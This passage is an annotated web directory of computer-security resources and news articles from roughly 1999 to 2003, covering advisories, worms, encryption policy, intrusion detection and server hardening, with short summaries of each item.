SECURITY
SITES
2600 The Hacker Quarterly
The online version of 2600, a "hacker quarterly" that provides information on hacking (or cracking) into computer and telecommunications systems.
Apache Week: Using User Authentication
Information on using the htpasswd program and .htaccess files to provide basic user authentication for Apache web servers.
Bugtraq mailing list archives
Archives for Bugtraq, a mailing list for detailed discussion of Unix security holes: what they are, how to exploit them, and how to fix them.
CERT 
The Computer Emergency Response Team (CERT) was created in 1988 by the Department of Defense. Their site has the latest security alerts as well as tips for internet systems security.
GnuPG - The Gnu Privacy Guard
"A complete and free replacement for PGP." Open-source encryption software, free of patents, and similar to PGP.
Hacker News Network
Daily news concerning computer and network security, hacking, and cracking.
Hideaway.Net - Security, Privacy, Anti-Virus, Linux
Texts and links concerning security, privacy, and associated topics.
ICSA Information Security Magazine
A monthly magazine dealing with computer and network security.
Lincoln Stein Locks Down Web Security
Outlines steps for securing your web site and preventing a break-in. Includes a FAQ and other resources. From Web Review.
Microsoft Security Advisor Program
Security headlines and software patches from Microsoft, for Microsoft products.
NTBugtraq
Editorials, FAQs, and news regarding security exploits and security bugs in Windows NT and related programs. Includes archives of the NTBugtraq mailing list.
The Open Web Application Security Project
"The project is developing software tools and knowledge based documentation that helps people secure web applications and web services. Much of the work is driven by discussions on the Web Application Security list at SecurityFocus.com."
Paj's Home: Cryptography
Information on the math behind RSA cryptography, the Vignere cipher, and cryptography in general.
PGP Home
Home page for PGP Security, owners and developers of Pretty Good Privacy (PGP) software.
Rootshell
Internet security news - reports on exploits of various machines, and papers describing security issues.
securityfocus
Lists of security compromises for various software packages, and news from the computer security world.
Thawte Knowledge Base
Information on computer security and cryptography, provided by Thawte, a Digitial Certificate provider.
VeriSign Repository
Information on digital certificates and security, focusing on VeriSign's products.
W3C Security FAQ
A detailed and authoritative FAQ about web site security. Alerts help spread the word about security holes.
The WWW Security FAQ
Frequently asked questions about website security and CGI security, written by Lincoln Stein and hosted by the W3C.
ARTICLES
Guarding Against Terror
Some general guidelines on helping to secure your company against electronic attack - and thoughts on the importance of doing so. (1/10/2002 at Web Techniques)
'NewLove' Bug Nastier Than 'ILOVEYOU'
A new email virus dubbed "NewLove" acts much like the ILOVEYOU virus except that it changes its name as it travels, and targets files essential for running Windows computers. (5/19/2000 at ZDNet)
.Net Demystified: What You Must Know About MS's Software Scheme
With .Net, Microsoft wants to connect all your information with a bunch of connected services; but how will they keep your information secure? (3/19/2001 at ZDNet Developer)
Abnormal IP Packets
An explanation of abnormal Internet Protocol packets, relevant to intrusion detection administrators. (10/13/2000 at SecurityFocus)
Ain't No Network Strong Enough
In his new book, "Secrets and Lies," cryptography expert Bruce Schneier says that no computer network is truly secure; the best we can hope for is good recoveries from catastrophes. (8/31/2000 at Salon.com)
Allchin: Disclosure May Endanger U.S.
Jim Allchin of Microsoft, at the antitrust trial, claimed that disclosing MS source code could damage national security. "He later acknowledged that some Microsoft code was so flawed it could not be safely disclosed." (5/21/2002 at eWeek)
Answers About Bastille Linux From Jon & Jay
A Slashdot interview with John Lasser and Jay Beale, the creators of the Bastille Hardening System, a system that attempts to "harden" Linux (against cracker attacks). (11/15/2000 at Slashdot.org)
Anti-Attack Feds Push Carnivore
Within hours of the plane crashes into the World Trade Center and Pentagon, the FBI had visited numerous ISPs, asking to add Carnivore machines to their networks to monitor traffic. (9/12/2001 at Wired News)
Antivirus Firms: FBI Loophole Is Out of Line
Anti-virus software companies including Symantec and Network Associates say they won't modify their programs to allow the FBI's "Magic Lantern" software to infect users' computers, and that they haven't been asked by the government to do so. (12/11/2001 at ZDNet)
Arrest Of Computer Researcher Is Arrest Of First Amendment Rights
Bruce Schneier on the injustice of arresting Dmitry Sklyarov for providing information and tools to break e-book encryption. (8/6/2001 at Internet Week)
Asymmetric Cryptography in Perl
An introduction to asymmetric encryption and Perl modules that help you work with it: Crypt::RSA, Crypt::DH, and Crypt::DSA. (9/26/2001 at Perl.com)
At Last! New Security Measures From MS
Microsoft has announced a two-part plan, the Strategic Technology Protection Program (STPP), to help users deal with security issues: part 1, Get Secure, helps users secure their systems; part 2, Stay Secure, is a commitment to ship more-secure software. (10/9/2001 at ZDNet)
Attack On Internet Called Largest Ever
A "distributed denial of service" (DDOS) attack on the Internet's 13 root servers caused 8 or 9 of them to go down for about an hour on October 21st; most Internet users didn't appear to notice any problems. (10/22/2002 at The Washington Post)
Authenticate and Track Users with PHP
How to use PHP to control user authentication, set and read cookies, and handle user sessions. (2/2/2000 at WebMonkey)
Big Hole in E-Mail Transfer App
Internet Security Systems (ISS) and Sendmail, Inc. announced that a security problem affecting all versions of sendmail after 5.79 has been discovered. (3/3/2003 at Wired News)
Black Hat: Users Warned About Wireless LAN Holes
Experts at the Black Hat conference in Las Vegas recommended that corporations using wireless networks use extra authentication systems to keep hackers from compromising a basic security hole in the Wired Equivalent Privacy (WEP). (7/12/2001 at Computer World)
Blueprint to Fight Cybercrime
At a meeting of the Group of Eight nations in Paris, the French Interior Minister called for more international coordination in cracking down on cybercrime, but argued against an international cyberpolice force. (5/15/2000 at Wired News)
A Brief History of The Worm
A history of self-replicating malware, from before Robert Morris' 1988 worm through today's Windows-based worms. (1/26/2001 at SecurityFocus)
Business: IM Is Getting Out of Control
Because of the lack of security and increasing popularity of instant messaging, a number of companies are working on secure IM applications for business use. (4/26/2001 at ZDNet)
Can We Provide Security for the Internet and Protect Free Speech at the Same Time?
Columnist Tom Regan backs off from his condemnation of online protestors, and recognizes the use of cyber-protest tools (including overloading "enemy" servers) as legitimate protest. (1/4/2000 at The Christian Science Monitor)
Catch Hackers in the Act
How to use intrusion detection systems (IDSes) to watch for malicious web activity from a remote browser, and be warned in real time of attempted web-based attacks. (12/13/2000 at builder.com)
CERT Coordination Center FTP Server Retired
Public-interest security group CERT/CC has retired its FTP server, and from now on will be serving publications from its website and through email only. (9/29/2000 at CERT Coordination Center)
CERT Statistics Tell Tale of Increasing Security Woes
Based on the first quarter of 2001, the number of incident reports and vulnerability reports which CERT/CC puts out this year will most likely top previous years. (4/27/2001 at InfoWorld)
CERT Summary CS-99-04
CERT Coordination Center's quarterly listing of online attacks notable either for the frequency with which the attack has been reported, or the nature of the attack. (11/23/1999 at CERT Coordination Center)
CERT to Disclose Software Flaws
The CERT Coordination Center, which tracks computer security issues and advises the public on protecting themselves, will reveal security problems to the public within 45 days of their discovery, whether fixes for the problem are available or not. (10/7/2000 at ZDNet)
CERTŪ Advisory CA-2001-37 Buffer Overflow in UPnP Service On Microsoft Windows
A security warning from CERT regarding vulnerabilities in several modern versions of Microsoft Windows. (12/20/2001 at CERT Coordination Center)
CERTŪ Advisory CA-2002-03: Simple Network Management Protocol (SNMP)
"Numerous vulnerabilities have been reported in multiple vendors' SNMP implementations. These vulnerabilities may allow unauthorized privileged access, denial-of-service attacks, or cause unstable behavior." (2/12/2002 at CERT Coordination Center)
CERTŪ Summary CS-2002-01
A summary of recent trends in computer security problems, provided by CERT: concerning SNMP, Solaris CDE, buffer overflows in Windows UPnP, ssh daemon problems, wu-ftpd, and more. (2/28/2002 at CERT Coordination Center)
Clinton Declares War on Cyberterrorists
President Clinton has asked Congress for funds to train college students to be computer security experts, in what is being described as an ROTC-like program. (1/7/2000 at ZDNet)
CNET Reviews 4 Internet Security Packages
Reviews of 4 personal firewall programs, geared towards home users on Windows machines. (8/1/2000 at CNET.com)
The Code Red Alert Continues
Technical information on how the Code Red worms work and what they do to your server; and how to stop them. (9/13/2001 at builder.com)
Code Red II: A Double Whammy
Code Red II, a worm which installs a back door in unpatched Windows machines running IIS, is infecting hundreds of thousands of machines. (8/6/2001 at ZDNet)
Computer Security Vulnerabilities Double In '01- CERT
According to CERT, the number of security incidents and the number of computer vulnerabilities both doubled from 2000 to 2001. (1/11/2002 at NewsBytes)
Configuring Linux and Squid as a Web Proxy
How to install and configure Linux and Squid on a machine to act as a web proxy. (5/30/2001 at SecurityFocus)
Congressional Audit Takes IRS to Task
A General Accounting Office (GAO) audit indicates that in 2000, the Internal Revenue Service (IRS) left their computers, and taxpayers' returns and personal information, unguarded against hackers. (3/16/2001 at ZDNet)
Construct Secure Networked Applications With Certificates, Part 1
How public-key cryptography works, and how certificates help. (1/12/2001 at Java World)
Construct Secure Networked Applications With Certificates, Part 2
X.509 certificates, and the Java classes that support their use. (2/16/2001 at Java World)
Construct Secure Networked Applications With Certificates, Part 3
Using certificate revocation lists (CRL) to terminate certificates which have been compromised. (3/16/2001 at Java World)
Construct Secure Networked Applications With Certificates, Part 4
Using Java classes to deal with public-key cryptography, X.509 certificates, and certificate revocation lists. (4/13/2001 at Java World)
Control Your Identity or Microsoft and Intel Will
Jon Udell shows how we could use existing technology to achieve many of the same goals that Microsoft wants to solve with Palladium; but argues that the ordinary consumer isn't motivated to do so. (7/8/2002 at O'Reilly Network)
Controlling Encryption Will Not Stop Terrorists
Security experts say that installing back-doors in encryption technology won't stop terrorists; they are more likely to use steganography to hide their communications, or plain old codewords. (9/18/2001 at New Scientist)
Cracker Launches Attack on NASA
A cracker claiming to be a 17-year-old high school student has defaced web pages at three government agencies, saying he wants to convince them the government to take security seriously. (11/23/1999 at Wired News)
Cracks Happen; Protect Thyself
Speakers and attendees at the RSA Conference in San Francisco, acknowledging that determined hackers can break almost any system, discussed getting end-users to stop using pirated software and running unsafe applications. (4/11/2001 at Wired News)
Critics Blast MS Security
Under certain circumstances, Windows 2000 will use weak security but tell its users that it is using strong security. (5/16/2000 at Wired News)
Cross-Site-TRACE
Talk about the XST - cross-site-trace - security hole in HTTP, which allows unauthorized scripts to be passed to webservers for execution. (1/24/2003 at Slashdot.org)
The Crux of NT Security - Phase One: The Approach
The key to NT network security is layered security. Assume your outer systems will be compromised; but stop all attacks at the periphery. (11/11/2000 at SecurityFocus)
Cyber-Crime Center Opens
The U.S. Customs CyberSmuggling Center opened in Fairfax County, Virginia, this week; the CyberSmuggling unit of U.S. Customs has been operating without a permanent home for 3 years. (10/5/2000 at The Washington Post)
Cyberwarfare: The Business Opportunity
Ths U.S. is putting together a center to both combat and practice online espionage, overseen by a U.S. Air Force general. (10/8/1999 at The Industry Standard)
Data Bunkers Protect Off-Site Sites
Web hosting companies are spending a lot of money, and a lot of effort, in making their data centers secure enough for the banks, ISPs, and governments that have sites hosted there. (11/9/1999 at The Washington Post)
Deciphering Encryption Law
An explanation of the Bureau of Export Administration's (BXA's) new (1/12/2000) regulations regarding encryption exports. (1/25/2000 at Upside)
Defenses Still Weak Against DDoS Attacks
Long after the Distributed Denial of Service attacks of 2000, Internet sites still aren't fully protected against a repeat. (1/19/2001 at ZDNet)
Detecting Local Filesystem Changes with Perl
Using Perl to figure out what an intruder might have changed on your Unix system. (8/30/2000 at O'Reilly and Associates)
Digital Detectives Track Hacks
As the number of security breaches online rises, security experts find themselves more in demand. (4/22/2001 at ZDNet Developer)
A Distant Sense of Security
HavenCo Ltd. (based on an open-sea platform in Sealand) and Mount10 International AG (based inside a mountain in the Swiss Alps) offer customers the ultimate in data security and anonymity. (9/20/2000 at The Washington Post)
Diverting Disaster: Preventing DoS Attacks
General guidelines on making your programming code resistant to security exploits. (4/21/2000 at Web Review)
DNS Security Update #1
ICANN's report on the security of the DNS system - the root servers, the underlying technology, etc. (1/4/2002 at ICANN)
Do Security Holes Demand Full Disclosure?
Marcus Ranum's keynote at DEF CON 8.0 this year brings up the question: is full disclosure of security vulnerabilities a good or bad thing? (8/16/2000 at ZDNet)
DOD Weighs Javascript Ban
The Department of Defense is considering banishing client-side scripting languages like Javascript and Active X from their web pages, to keep mobile code from launching attacks from DOD workers' browsers. (11/22/1999 at ZDNet)
Does IIS Have a Future?
Columnist Tim Mullen says that switching your webserver from IIS to an alternative (like Apache) because you can't secure IIS is a bad idea; if you can't secure IIS, you won't be able to secure other web servers, either. (10/7/2001 at SecurityFocus)
dsniff and SSH
A defense of SSH and SSL, in response to suggestions they are woefully insecure protocols. (12/22/2000 at O'Reilly and Associates)
Easy Eavesdropping on Wireless Networks
A paper published by researchers at UC Berkeley and Zero-Knowledge Systems points out the inherent flaws of the Wireless Ethernet Compatibility Alliance's (WECA) encryption system, Wired Equivalent Privacy (WEP). (2/27/2001 at Business Week)
Encryption Tutorial
A several-part tutorial on encryption, covering asymmetric and symmetric key-based algorithms, hashing, PGP, crypt, and mcrypt. (5/11/2000 at WebMonkey)
The End of SSL and SSH?
With the release of dsniff 2.3 - a sniffing tool that allows an attacker to intercept SSL and SSH connections - the computer world needs better security. (12/18/2000 at SecurityPortal)
Experts Applaud Microsoft's Security Moves
Microsoft says it is making fundamental changes to Outlook - having it refuse to open program attachments and limit access to address books - to hinder future email viruses. (5/16/2000 at InternetNews.com)
Experts: Asia Not Taking Net Security Seriously
According to IDC Asia-Pacific, Asian business do not take cybersecurity seriously; they view Web defacements as minor embarrassments. (3/16/2001 at Excite News)
Experts: E*TRADE Still Not Safe
E*TRADE is once again plagued by security problems with its service. (9/26/2000 at InternetNews.com)
File-Sharing Programs Carry Trojan Horse
Grokster and Limewire, two popular file-sharing programs, apparently come bundled with "spyware" provided by third-party advertisers. (1/2/2002 at News.com)
FTP Buffer Overflows
Unix and open-source security advisories: buffer overflows in several FTP daemons, Oracle Application Server, and more; temporary file race conditions in pine and pico; mkpasswd; and more. (4/17/2001 at O'Reilly Network)
Gates Vows to Plug Holes
Embracing a philosophy he calls "Trustworthy Computing," Bill Gates says he wants Microsoft's workers to focus on security and privacy in their products, and see them as more important than new features. (1/17/2002 at Wired News)
Gobbles Releases Apache Exploit
Gobbles Security has released a tool that exploits the recently-divulged chunked encoding vulnerability in Apache; the program, Apache-scalp.c, works against OpenBSD boxes running unpatched Apache versions. (6/20/2002 at SecurityFocus)
H2K2 Hackers Say They Want a Revolution
Aaron McGruder, author of the comic strip Boondocks, got a standing ovation at the H2K2 hacker conference; while attendees debated the ethics of former hackers working for security companies and the government. (7/15/2002 at SecurityFocus)
Hack Attack? Relax, You're Covered
Lloyd's of London is offering discounted insurance against money lost to hacker and cracker attacks through a partnership with Counterpane, a computer security firm. (7/10/2000 at The Industry Standard)
HacK, CouNterHaCk
A profile of LOpht, a "gray-hat" hacker/cracker group that spends its time finding vulnerabilities in software and publishing them for both "black hat" crackers and software developers' perusal. (10/3/1999 at The New York Times)
Hack-umentary, the E-Film
In a well-received 11-minute short film released on the Web, a recent graduate of the Rhode Island School of Design interviewed members of Cult of the Dead Cow, the hackers who released the Back Orifice program. (2/14/2000 at Wired News)
Hacker Re-writes Yahoo! News Stories
Freelance security consultant Adrian Lamo demonstrated that using an ordinary Web browser and Yahoo's proxy servers, he could subtly alter the content of the portal's news stories, spreading disinformation to readers. (9/20/2001 at New Scientist)
Hacker Startup Joins E-security Market
L0pht Heavy Industries, a well-known security "think tank," is merging with AtStake to form a computer security firm; they already have $10 million in funding. (1/6/2000 at ZDNet)
Hackers Caught in Security 'Honeypot'
Lance Spitzer, a security consultant with Sun Microsystems, uses a "honeypot" - an Internet-connected server of no strategic importance to his company - to observe hackers trying to break in to corporate systems. (12/19/2000 at ZDNet)
Hackers Forming Zombie Army
The CERT Coordination Center warns that crackers are compromising computers across the Internet in preparation for massive denial of service attacks using Tribal Flood; most of the affected systems run Red Hat Linux. (9/18/2000 at ZDNet)
Hackers in Suits? Gadzooks!
DefCon, "the annual computer underground party for hackers," is becoming more corporate: security guards check for badges, underage drinking is now discouraged, and there are daily press conferences; some attendees are protesting the changes. (7/14/2001 at Wired News)
Hackers' Tricks to Avoid Detection
Some simple ways in which hackers can conceal their attempts to compromise your web applications, and conceal where they're attacking from. (11/1/2000 at CNET.com)
Handhelds: Here Come the Bugs?
Security firms such F-Secure and Network Associates are releasing programs to defend handheld devices from viruses and Trojan horses; some say they're overhyping a nonexistent danger. (3/19/2001 at ZDNet)
Hard Time for E-Commerce Saint?
Raphael Gray, a teenager who hacked into numerous e-commerce sites, grabbed thousands of credit card numbers, and posted them publicly in a campaign to expose the dangers of online commerce, has pled guilty to cracking into customer databases. (4/22/2001 at Wired News)
Hidden in Plain Sight
Using Java's Filter classes to implement steganography - hiding information in pictures. (7/13/2001 at Web Techniques)
Homeland Insecurity
A long look at Bruce Schneier's thoughts on security, and how they have evolved from emphasizing encryption to compartmentalizing dangers and keeping well-trained people in the security loop. (9/10/2002 at The Atlantic Monthly)
Hotmail Virus Threat
Cross-site scripting problems mean that free webmail services like Hotmail and Yahoo Mail could easily spread email viruses far and wide. (6/1/2001 at SecurityFocus)
How Code Red Revealed the Perils of Port 80
As more embedded devices are given IP addresses and mini-webservers, poorly written software may result in devices being controlled or disabled by malicious hackers using viruses like Code Red or plain old web browsers. (10/1/2001 at ZDNet)
How Much Hack Info Is Too Much?
Security experts are divided over whether it was appropriate to post a recent message to BugTraq showing how to reformat the hard drives of Internet Explorer users, using code on a web page. (11/19/2002 at Wired News)
How to Crack Open an E-Book
A hacker has figured out how to break the encryption on RocketBook e-books; the information is now circulating via web and email. (4/27/2001 at Wired News)
How Web Servers Help Attackers
How interactive outbound connections, allowed by weak network security, can compromise your web server. (9/6/2000 at builder.com)
The Hunt for the Worm Writers
The FBI's National Infrastructure Protection Center (NIPC) is working hard to determine who wrote the SirCam and Code Red worms, but has had no luck so far. (8/9/2001 at Wired News)
ICANN Tables Current Agenda
ICANN has decided, for the near future, to concentrate on the stability of the Internet, rather than on domain name policy. (9/27/2001 at InternetNews.com)
ICQ Logs Spark Corporate Nightmare
eFront, an online advertising affiliation company, is suffering because hackers have posted the instant messaging archives of its CEO, Sam Jain, to numerous websites; Jain had ICQ set to log his messages. (3/15/2001 at News.com)
IDS False Positive and False Negative Reduction Strategies and Techniques, Part Two
A few ways to reduce false alarms in intrusion detection systems. (9/27/2001 at SecurityFocus)
ILOVEDRAMA: Love Bug Hunt Continues
Links to coverage of the hunt for the creator(s) of the ILOVEYOU virus/worm. (5/9/2000 at The Industry Standard)
Infectable Objects, Part Five - HTML and Other Scripts
How web-based scripts can be infected with malicious code. (4/18/2001 at SecurityFocus)
Interbase Backdoor, Secret for Six Years, Revealed in Source
Slashdot discussion of a back-door account in the recently-open-sourced Interbase database, and the merits of open source vs. closed source in terms of security. (1/11/2001 at Slashdot.org)
Interior Dept. Sites Still Down
U.S. District Judge Royce Lamberth has ordered the U.S. Department of the Interior's Internet access shut down, because lax security allows hackers to infiltrate department systems and alter Indian Trust financial records at will.
(12/10/2001 at Wired News)
Internet Giants Confer on Denial-of-Service Attacks
The Bay Area DDoS Working Group (a national group) is working on stopping distributed denial-of-service attacks like the ones that took down major sites in February, 2000. (9/26/2000 at News.com)
Internet Security Alliance Debuts
The Internet Security Alliance (www.isalliance.org), an industry group dedicated to sharing security information and working against malicious hackers, was launched on April 19, 2001. (4/19/2001 at Excite News)
Internet Too Complex to Secure, Says Exec
Bruce Schneier, CTO of Counterpane Internet Security, plans to tell Congress that the Internet can't be kept secure; we just have to deal better with security problems and lapses. (7/13/2001 at Network World Fusion)
Introduction to Autorooters: Crackers Working Smarter, not Harder
Autorooters - software that automatically scans a machine or network for multiple security vulnerabilities and invades vulnerable machines - explained. (8/21/2002 at SecurityFocus)
An Introduction to Intrusion Detection Systems
An overview of IDSes - host-based and network-based - and how they work: anomaly detection, signature detection, target monitoring, and stealth probes. (12/6/2001 at SecurityFocus)
An Introduction to OpenSSL, Part One: Cryptographic Functions
A look at OpenSSL, a library implementing Secure Sockets Layer (SSL) protocol routines; covers basic cryptographic concepts. (8/22/2001 at SecurityFocus)
An Introduction to OpenSSL, Part Two: Cryptographic Functions Continued
How to get, compile, and install OpenSSL, and how to use some basic cryptographic commands. (9/5/2001 at SecurityFocus)
Introduction to PAM
How to use Pluggable Authentication Modules (PAM) to interface your programs with any type of authentication system available on your Linux box. (9/27/2001 at O'Reilly Network)
Introduction to Security Policies, Part Three: Structuring Security Policies
How to write a good security policy. (10/9/2001 at SecurityFocus)
Introduction to Security Policies, Part Two: Creating a Supportive Environment
Getting management buy-in for your security policies. (9/24/2001 at SecurityFocus)
An Introduction to XML Digital Signatures
A look at XML Signature, a means of ensuring the integrity and authenticity of business documents transferred over the Internet. (8/8/2001 at XML.com)
Intrusion Detection Systems: An Opening For Hackers?
The National Infrastructure Protection Center (NIPC) says that intrusion detection systems on computer systems can potentially be overwhelmed by stress-testing tools, leaving hackers free to attack undetected. (3/15/2001 at NewsBytes)
IRC: Attack From Killer 'HaX0rZ'
Internet Relay Chat (IRC) is dying a slow death at the hands of hackers launching DOS attacks against IRC servers. ISPs that rushed to stop attacks against major commercial sites last year aren't working quite as hard to save the free chat service. (1/9/2001 at Wired News)
Is Anyone Accountable for Net Security Snafus?
Software companies try to deflect blame for security problems in their software by having users sign away their right to sue for any problems which occur. Instead, they should be improving their products. (8/31/2000 at ECommerce Times)
Is Scanning the Answer to Web Attacks?
In the wake of the Denial of Service attacks against major websites, many system administrators are reluctant to use FBI-supplied intruder detection tools, for which the FBI is not releasing source code. Open-source alternatives exist. (2/10/2000 at InternetNews.com)
Java JDE Allows Unauthorized Commands
Recent Unix and open-source security advisories: Java problems, Solaris LDAP authentication, XFree86, sudo, Zope, and more. (2/27/2001 at O'Reilly Network)
JSP = Java Source Peeking?
Implementation problems with various Java application server platforms allow remote users to view Java source code which should be hidden; some tips on securing your code are given here. (10/4/2000 at builder.com)
Kevin Mitnick Bares All
At Giga Research's Infrastructures for E-Business conference, Kevin Mitnick spoke for the first time since leaving jail, giving managers advice on security. (9/28/2000 at The Industry Standard)
Killer Worm Found "In the Wild" on Internet
A new Windows-based Internet worm that can update itself automatically (once it infects a computer, it checks in to a remote website) is replicating on the Net. (10/31/2000 at InternetNews.com)
Klez Won't Stop Making Net Rounds
The Klez virus and its variants, which debuted in April 2002, is still being spread by email users running MS Outlook on Windows PCs without sufficient anti-virus protection. (3/4/2003 at Wired News)
Leads Aid in Narrowing List of Suspects in Web Attacks
Investigators have determined that the attacks against major websites last week utilized compromised computers from several California universities, and have identified a small group of suspects. (2/14/2000 at MSNBC)
Linux Worm Hits the Network
The Linux.Slapper.Worm, apparently built to aid in launching distributed denial of service attacks, spreads by compromising Linux servers with vulnerable versions of OpenSSL. (9/16/2002 at Wired News)
List: Windows, Unix Still at Risk
The FBI and SANS released an updated list of the top 20 Internet security vulnerabilities, and advice on fixing them. (10/3/2002 at Wired News)
Major New Worm Poses Serious Threat
A new worm that infects Windows systems, the Nimda virus, can be passed on via email, web browsing, or file sharing; after infection, it inspects other target machines for 10 to 100 known Windows vulnerabilities in an attempt to spread. (9/18/2001 at InfoWorld)
Major Online Credit Card Theft Exposed
In January, 1999, a cracker stole information on over 485,000 credit card accounts from a website and stored the info on a U.S. government computer; it wasn't until December 1999 that Visa notified member institutions. Some of the accounts are still open. (3/17/2000 at ZDNet)
Malicious HTML Tags Embedded in Client Web Requests
CERT's advisory regarding "cross-site" scripting - which can allow malicious users to run arbitrary code on web servers that take in, then display, user input. (2/2/2000 at CERT Coordination Center)
Market Realities Hit Security Nonprofit
The CERT Coordination Center at Carnegie Mellon University receives $3.5 million annually from the U.S. government to gather and distribute security information to the public; it will soon start charging for premium services, like early warnings. (4/20/2001 at The Industry Standard)
Microsoft's Outlook: Cloudy Security
IT managers are beginning to express discontent with Microsoft for building software that is especially susceptible to email viruses such as ILOVEYOU and Melissa. (5/15/2000 at ZDNet)
Most Say Computer Hacking Should Be a Felony
A majority of U.S. adults say that computer hacking which disrupts a company's Internet services should be punishable as a felony. (8/28/2000 at Yahoo News)
MS SQL Server Worm Wreaking Havoc
Discussion of the Microsoft SQL worm which slowed down Internet performance starting early morning, January 25th, 2003. (1/25/2003 at Slashdot.org)
Multiple Vulnerabilities in BIND
CERT reports that numerous vulnerabilities of varying severity have been found in BIND (a popular domain name server). (11/10/1999 at CERT Coordination Center)
The Net Scare
DOS (denial of service) attacks such as the ones that recently took down Yahoo, Amazon, and other major sites are nothing new; they don't really threaten the average Net user, but they are an incentive for technologists to improve the Net's security. (2/10/2000 at Salon.com)
Net Vigilance
A debate - which is more secure: open-source software, or proprietary? (7/16/2001 at ZDNet Developer)
New Internic Email Security Hole
Details on the security problems Network Solutions, Inc., created with their free email system. (9/24/1999 at 2600 - The Hacker Quarterly)
New Web Attack Tools Exploit Chat Technology
Security experts have discovered Trinity v3, a new distributed denial of service (DDoS) tool that uses Internet Relay Chat (IRC). (9/5/2000 at News.com)
Nimda Spreads--Worse Than Code Red?
The Nimda virus is victimizing Windows machines across the world, and is expected to spread further and faster than Code Red; experts say there's no evidence to link it to the recent terrorist attacks in the U.S. (9/19/2001 at ZDNet)
Nimda: Another Worm, More Patches
The Gartner Group recommends that corporations that have been hit by the "Code Red" and Nimda viruses immediately "investigate alternatives" such as servers from iPlanet and Apache.
(9/21/2001 at ZDNet)
No More I Love You Viruses
The defence evaluation and research agency (DERA) plans to release software, ::Mail, which acts as a plugin on users' email programs; it forces the user to authorize all outgoing email, which theoretically would stop email viruses from spreading. (4/24/2001 at The Register)
Not What It's Cracked Up to Be
A theory on the hacking of Microsoft's corporate network: it was an inside job. (11/2/2000 at PBS)
NSA Takes the Open Source Route
The National Security Agency (NSA) is paying NAI labs, a division of PGP Security, $1.2 million over two years to help develop SELinux, a more secure kernel for Linux. (4/11/2001 at Wired News)
Open RSA: The Patent Expires
What the release of the RSA encryption algorithm into the public domain means for the future, and how the algorithm was first created. (9/8/2000 at O'Reilly Network)
OpenBSD Plugs a Rare Security Leak
A security bug in OpenBSD 2.7 was exploited earlier this week; the proactive developers of the "secure by default" operating system had fixed the bug months ago, but not distributed the fix yet. (10/6/2000 at Upside)
OpenSSH Problems
Recent security problems related to Linux: OpenSSH and sftp vulnerabilities, hylafax, Apache on MacOS X, and more. (10/1/2001 at O'Reilly Network)
An Overview of LIDS
A look at how LIDS (the Linux Intrusion Detection System, which removes some of root's privileges to improve system security) works, and how to install and configure it (10/17/2001 at SecurityFocus)
Palladium Holds Promise, and Peril
Microsoft's Palladium could enhance security and protect consumers from viruses and spam; but it could also lock consumers in to hardware and software manufacturers, by holding their information hostage. (7/8/2002 at SecurityFocus)
Password-Protecting Your Web Pages
Using passwords to keep people out of private web pages, with a focus on Microsoft FrontPage and IIS. (4/21/2000 at 15 Seconds)
Passwords Don't Protect Palm Data, Security Firm Warns
Security firm @Stake has demonstrated that the Palm OS is insecure, and that anyone with physical access to a Palm or Visor can break through password protection to get access to the data on it. (3/2/2001 at News.com)
Passwords Soon To Be Passe
Some biometric devices - devices that identify users by appearance, fingerprint, voice, or other biological characteristic - are already available for sale. (2/7/2000 at The Record Online)
Paul Vixie and David Conrad on BINDv9 and Internet Security
Paul Vixie and David Conrad of the Internet Software Consortium talk about BINDv9, a complete rewrite of the DNS software, Linux, and BSD. (10/3/2000 at Linux Security)
PBF (Pretty Big Flaw) in PGP
A PGP plugin for Microsoft Outlook contains a vulnerability that would let attackers take over a user's computer with a specially-crafted email message. (7/11/2002 at Wired News)
PDF Files May Carry Peachy Virus
A virus that can spread through Adobe's Acrobat software, but not Acrobat Reader, has been developed, raising fears that Reader users may become susceptible to PDF viruses. (8/8/2001 at ZDNet)
Phone Phreaks to Rise Again?
Views are mixed on whether IP-based telephones will cause a resurgence in phreaking - the telephone system equivalent of hacking. (5/16/2000 at Wired News)
Playing With Fire: Not So Sweet Honeypots
What a honeypot is (a system designed to lure "black hat" hackers for observation), why you might want to set one up, and general rules for setting up such a machine. (1/12/2001 at internet.com)
Port Scans Legal, Judge Says
A judge in a federal court has ruled that port scanning a computer network does not damage it; thus, corporations can't sue for "damages" caused by a port scan. (12/18/2000 at SecurityFocus)
Preventing Cross-site Scripting Attacks
By processing user input correctly and using Apache::TaintRequest, Perl can help prevent cross-site scripting attacks on your users. (2/20/2002 at Perl.com)
Privacy Advocate Shifts Gears
Richard Smith is resigning his position as CTO of the Privacy Foundation to work as an independent security consultant. (11/8/2001 at Wired News)
The Privacy War of Richard Smith
Richard Smith, a privacy advocate who's technically savvy enough to deconstruct software and determine when users' privacy is violated, is respected and feared throughout the software industry. (2/10/2000 at Business Week)
A Private Little Cyberwar
Jay Dyson's crusade against Hagis - "Hackers Against Geeks in Snowsuits" - has cost him his marriage and his health. (2/7/2000 at Forbes)
Protecting User Passwords
How to implement a secure method, using MD5 and Javascript, for users to authenticate to a website. (1/31/2000 at builder.com)
Putting Some Teeth in Cybersecurity
Some security firms believe that owners of insecure computers whcih are used to launch attacks over the Internet may one day be sued for their negligence. (3/17/2000 at The Christian Science Monitor)
Researchers Refuse Carnivore Review
Several groups of researchers have refused to review Carnivore, the Justice Department's controversial email-tapping system, due to what they call unacceptable restrictions by the government. (9/6/2000 at USA Today)
Researchers: Newest Microsoft IE Patch Flawed
Security researcher Thor Larholm and Israeli group GreyMagic Software say Microsoft's latest Internet Explorer patch doesn't fix all the vulnerabilities it claims. (5/20/2002 at CNN)
RSA Releases Patents Two Weeks Early
RSA Security Inc. released its cryptographic patent to the public domain on September 6, 2000, rather than wait for the patent to expire on September 20. (9/6/2000 at ZDNet)
The Scent of an Easy Prey
ShareSniffer is idiot-proof software that lets anyone scan a range of IP address for shared files on Windows machines; creator Kerry Rogers says he wrote it to encourage the sharing of information on the Internet. (3/15/2001 at Business Week)
Securing Connections to Your Web Site
A look at how to provide secure connections to your website: symmetric and assymetric encryption, SSL, HTTPS. (7/13/2001 at Web Review)
Securing Outlook, Part One: Initial Configuration
Initial steps that users can take to reduce security problems with Microsoft's email program, Outlook. (12/10/2002 at SecurityFocus)
Security and Apache: An Essential Primer
A long, detailed explanation of how Apache security works - restricting access by password or IP address, how realms work, and more. (2/21/2000 at Linux Planet)
Security Flaws Found in PHP
Stefan Esser of e-matters found multiple vulnerabilities in several versions of PHP; users are urged to upgrade to PHP 4.1.2. (2/28/2002 at InternetNews.com)
Security Guru Says Known Vulnerabilities Are No. 1 Hacker Exploit
